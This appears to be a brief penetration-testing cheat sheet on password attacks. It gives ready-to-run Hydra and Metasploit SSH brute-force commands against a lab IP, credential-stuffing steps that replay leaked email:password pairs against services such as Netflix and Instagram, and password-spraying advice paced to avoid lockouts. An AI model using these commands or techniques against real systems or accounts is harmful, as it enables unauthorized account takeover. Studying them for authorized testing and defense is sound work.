Password Attacks 101

Brute force

When you see an exposed auth (eg. SSH) try brute forcing to test password strength and detect weak/default creds. During pentests we may be loud on purpose to see detection.

• Hydra example:

hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://10.0.2.4:22 -t 4 -V

• Metasploit aux scanner:

msfconsole
search ssh
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set RHOSTS 10.0.2.4
set THREADS 10
set VERBOSE true
run

Credential stuffing

Replay leaked username:password pairs from breaches against services (Netflix, Instagram, etc.). Fast, low-effort checks, use Pitchfork mode in Burp Intruder to align username->password pairs.

• Example leaked creds:

alice@gmail.com:qwerty123
bob@yahoo.com:letmein2020

Use Burp Intruder → Payloads → Pitchfork (one list usernames, other list passwords) to test matched pairs.

Password spraying

Try one/few common passwords across many users to avoid account lockouts (1–2 attempts/user). Good for large directories.

• Example: try Spring2024! against:

alice@example.com
bob@example.com
carol@example.com

Use Burp Intruder Sniper or a custom script; spacing attempts over time to reduce lockout risk.